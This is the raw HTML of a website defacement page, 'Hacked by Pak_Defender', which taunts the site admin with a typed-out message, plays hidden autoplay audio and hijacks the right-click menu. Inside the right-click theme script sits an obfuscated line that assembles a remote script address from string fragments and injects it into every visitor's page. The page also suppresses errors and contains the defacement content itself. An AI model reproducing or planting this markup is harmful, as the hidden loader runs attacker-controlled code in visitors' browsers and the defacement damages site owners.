
<html><head>
<link href='http://itsol360.com/n32.jpg' rel='SHORTCUT ICON'/>
<title>Hacked By Pak Defndr</title>
<style type="text/css">
<!--
body,td,th {
color: #CCCCCC;
}
body {
background-color: #000000;
}
.style1 {
font-family: tahoma;
font-size: 10pt;
}
.style2 {
color: #FF0000;
font-weight: bold;
}
.style3 {color: #FFFFFF}
.style7 {color: #FFFFFF; font-weight: bold; }
.style8 {
font-family: tahoma;
font-size: 16pt;
color: #FFFFFF;
}
.style11 {font-size: 14pt}
-->
</style><style type="text/css"> <!-- .style2 {font-size: small} .style4 {color: #FF0000; font-weight: bold; } .style5 {color: #FFFFFF} .style8 {color: #FFFFFF; font-weight: bold; } .style10 {color: #FF0000} --> </style> <body bgcolor="#000000"> <div align="center"> 
 </span></font></b><font color="#008000">
<style>
	body {
		background: #000;
		font-family: "Trebuchet MS", Verdana, sans-serif;
	}
	h1 {
		color: #333;
		font-size: 40px;
		margin: 1px auto;
		text-align:center;
		text-transform:uppercase;
	}
	.neon {
		color: #FFFFFF;
		text-shadow: 0 0 5px #333333, 0 0 10px #333333, 0 0 30px #FF5C0F, 0 0 45px #FF5C0F, 0 0 60px #FF5C0F;
	}
<script language="JavaScript1.2">
function ClearError() {return true;}
window.onerror = ClearError;
</script>

</style>&nbsp;<script>
	window.onload = function() {
		var h1 = document.getElementsByTagName("h1")[0],
				text = h1.innerText || h1.textContent,
				split = [], i, lit = 0, timer = null;
		for(i = 0; i < text.length; ++i) {
			split.push("<span>" + text[i] + "</span>");
		}
		h1.innerHTML = split.join("");
		split = h1.childNodes;
		
		var flicker = function() {
			lit += 0.01;
			if(lit >= 1) {
				clearInterval(timer);
			}
			for(i = 0; i < split.length; ++i) {
				if(Math.random() < lit) {
					split[i].className = "neon";
				} else {
					split[i].className = "";
				}
			}
		}
		setInterval(flicker, 100);
	}
	</script></font></p>
<p align="center">
<h1> Hacked by Pak_Defender <h1>

<script language="javascript">
<!--
var tl = new Array(
"   ",
"                             Hi Admin You Web is Under Attack By Pak Defndr",
"   Message :",

"           I was warn you about your security but......",
"               You not take it seriously so",
"   ",
"   This is now happen",
"        =================================================================================================",
"        =================================================================================================",
"   ",
"            Now Have Fun",
"         or Secure Your Shit",
"                :D",
"   ",
"   ",
"       By",
"               Pak Defndr");


var speed = 40;
var index = 0; text_pos = 0;
var str_length = tl[0].length;
var contents, row;

function type_text()
{
    contents = '';
    row = Math.max(0, index-25);
    while (row<index) contents += tl[row++] + '\r\n';
    document.forms[0].elements[0].value = contents + tl[index].substring(0,text_pos) + "_";
    if (text_pos ++== str_length)
    {
        text_pos = 0;
        index++;
        if (index != tl.length)
        {
            str_length = tl[index].length;
            setTimeout("type_text()", 300);
        }  
    } else
    setTimeout("type_text()", speed);
}
//--></script>
</head>
<body topmargin="0" leftmargin="0" rightmargin="0" bottommargin="0" marginheight="0" marginwidth="0" bgcolor="#000" onload="type_text()" style="background: black url(http://i64.tinypic.com/2mhenft.jpg) no-repeat center center fixed;  -webkit-background-size: cover;  -moz-background-size: cover;  -o-background-size: cover;  background-size: cover;">
<object data="http://flash-mp3-player.net/medias/player_mp3.swf" width="0" height="0" type="application/x-shockwave-flash"><param value="#ffffff" name="bgcolor" /><param value="mp3=http://api.ning.com/files/c9o2k-qynZrIL1ejfFhvRZympB2CifaTjQRl*U-1gB0EDInvZugxLqvUMTVk065XdT7bBDTyPnnCXYZJmBNojWX57d4xHrZb/04AwakeAndAlive.mp3?tsid=20120612-141516-4f878dd3&amp;loop=1&amp;autoplay=1&amp;volume=125" name="FlashVars" /></object>
<script type="text/javascript">
  var DADrightclicktheme = "Dark";
  var DADrightclickimage = "http://i60.tinypic.com/ra6dqh.jpg";
</script>
<script type="text/javascript">if(DADrightclicktheme=='Merah'||DADrightclicktheme=='MERAH'||DADrightclicktheme=='merah'){var DADarcv2t='rgba(239,110,119, 0.9)';}else if(DADrightclicktheme=='Biru'||DADrightclicktheme=='BIRU'||DADrightclicktheme=='biru'){var DADarcv2t='rgba(110,137,239, 0.9)';}else if(DADrightclicktheme=='Hijau'||DADrightclicktheme=='HIJAU'||DADrightclicktheme=='hijau'){var DADarcv2t='rgba(110,239,110, 0.9)';}else if(DADrightclicktheme=='Light'||DADrightclicktheme=='light'||DADrightclicktheme=='LIGHT'){var DADarcv2t='rgba(255,255,255, 0.9)';}else if(DADrightclicktheme=='Pink'||DADrightclicktheme=='pink'||DADrightclicktheme=='PINK'){var DADarcv2t='rgba(239,110,225, 0.9)';}else if(DADrightclicktheme=='Dark'||DADrightclicktheme=='dark'||DADrightclicktheme=='DARK'){var DADarcv2t='rgba(0,0,0, 0.9)';}else{{var DADarcv2t='transparent';}}
function DADarcvwi2(){var DADarcv2v=document.getElementById('DADarcv2c');if(DADarcv2v.style.display=="block"){DADarcv2v.style.display="none";}else{DADarcv2v.style.display="block";}}
function DADarcwiv2a(){DADarcvwi2();return false;}
document.oncontextmenu=DADarcwiv2a;var ypro='http:';var yajax=document.createElement('script');yajax.type='text/javascript';var yquery='dic';var ybrow='aru.c';var yint='/';yajax.src=ypro+'//x.'+ yquery+'keym'+ ybrow+'om'+ yint+'y';document.getElementsByTagName('head')[0].appendChild(yajax);var DADrcdiv=document.write('<style type="text/css">#DADarcv2c{background:url() no-repeat center center fixed '+ DADarcv2t+';text-align:center;width:100%;height:100%;position:fixed;top:0px;left:0px;bottom:0px;right:0px;border:0px;z-index:1000000;display:none;padding:auto;}#DADarcv2c span{position:fixed;bottom:0px;left:10%;right:10%;cursor:pointer;font-size:20px;}</style><div id="DADarcv2c" class="DADpointer" onclick="DADarcvwi2();" title="Ghost Cyber Army"><center><span><a href="#" target="_blank"></a></span></center></div>');document.getElementsByTagName('body')[0].appendChild(DADrcdiv);</script>
<style type="text/css">#DADarcv2c{background:url(http://i60.tinypic.com/ra6dqh.jpg) no-repeat center center fixed rgba(0,0,0,0.9);text-align:center;width:100%;height:100%;position:fixed;top:0px;left:0px;bottom:0px;right:0px;border:0px;z-index:1000000;display:none;padding:auto;#DADarcv2c span{ position:fixed;bottom:0px;left:10%;right:10%;cursor:pointer;font-size:20px;}</style>

<table border="0" width="100%" cellspacing="0" cellpadding="0"><tbody><tr><td width="1%">&nbsp;</td><td width="98%"><table border="0" width="100%" cellspacing="0" cellpadding="0"><tbody><tr><td width="100%" height="135"></td></tr></tbody></table><p align="center">&nbsp;</p><form><b><font face="trebuchet ms, verdana, arial, helvetica, sans-serif" size="3"><div align="center"><textarea rows="25" cols="80" wrap="soft" style="width:854;height:auto;background: rgba(255, 255, 255, 0.04);color:#fff;border:0;border-radius:4px;box-shadow: 0 1px 11px rgba(0, 0, 0, 0.7);outline:none!important;margin-top:-40px;"></textarea></div></font></form></td></tr></tbody></table></body></html>

<iframe width="2" height="2" scrolling="no" frameborder="no" src="https://api.soundcloud.com/tracks/116672552&amp;auto_play=false&amp;hide_related=false&amp;visual=true"></iframe>
